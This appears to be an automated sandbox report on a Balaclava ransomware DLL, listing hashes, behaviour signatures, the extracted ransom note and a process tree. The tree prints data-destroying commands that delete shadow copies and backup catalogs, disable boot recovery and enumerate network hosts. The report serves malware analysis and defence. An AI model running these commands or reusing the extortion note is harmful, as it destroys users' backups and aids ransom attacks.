Overview

overview

10

Static

static

05a6fca525...23.dll

windows7_x64

10

05a6fca525...23.dll

windows10-2004_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    05/03/2022, 15:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    05a6fca52556551b286603a139394bfb6526c8f5d87929f1ed68908b7a76a623.dll

  • Size

    212KB

  • MD5

    25a0c625ef34156e73a69a477e80a6e8

  • SHA1

    2bb975338e4ed4f24aaaa231b161bcb228a2bc3f

  • SHA256

    05a6fca52556551b286603a139394bfb6526c8f5d87929f1ed68908b7a76a623

  • SHA512

    b5822c9f05240cb41ef69ec0fe3ba38f12389b6507e256b39905749ecd951617904d94b9ea0006c6cfd52e7aec64e93fa85a5a16ff26c06791a0d37e2aad805e

Score
10/10
balaclavaransomware

Malware Config

Extracted

Path

C:\RECOVERY DATA INFORMATION.TXT

Family

balaclava

Ransom Note
Hello! If you see this message - this means your files are now encrypted and are in a non-working state! Now only we can help you recover. If you are ready to restore the work - send us an email to the address [email protected] In the letter, specify your personal identifier, which you will see below. In the reply letter we will inform you the cost of decrypting your files. Also from your servers files, documents, databases SQL, PDF were uploaded to our cloud storage After we agree, you will receive a decryption program, as well as all your files on our server will be deleted. Otherwise, they will fall into the open access of the Internet! Before payment you can send us 1-2 files for test decryption. We will decrypt the files you requested and send you back. This ensures that we own the key to recover your data. The total file size should be no more than 3 MB, the files should not contain valuable information (databases, backups, large Excel spreadsheets ...). Please be sure that we will find common languge. We will restore all the data. Email to contact us - [email protected] Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. Your personal ID: 131-C08-774

Signatures

  • Balaclava Malware

    Balaclava malware is a ransomware program.

    ransomwarebalaclava
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Discovers systems in the same network 1 TTPs 1 IoCs
    discovery
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\05a6fca52556551b286603a139394bfb6526c8f5d87929f1ed68908b7a76a623.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3468
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\05a6fca52556551b286603a139394bfb6526c8f5d87929f1ed68908b7a76a623.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in Program Files directory
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /C chcp 1250 && net view
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3504
        • C:\Windows\SysWOW64\chcp.com
          chcp 1250
          4⤵
            PID:1220
          • C:\Windows\SysWOW64\net.exe
            net view
            4⤵
            • Discovers systems in the same network
            PID:2948
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3444
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic shadowcopy delete
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1564
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
          3⤵
            PID:3796
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
            3⤵
              PID:2876
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
              3⤵
                PID:3416
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
                3⤵
                  PID:3784
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1584
                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                    wmic shadowcopy delete
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2272
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:3296

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads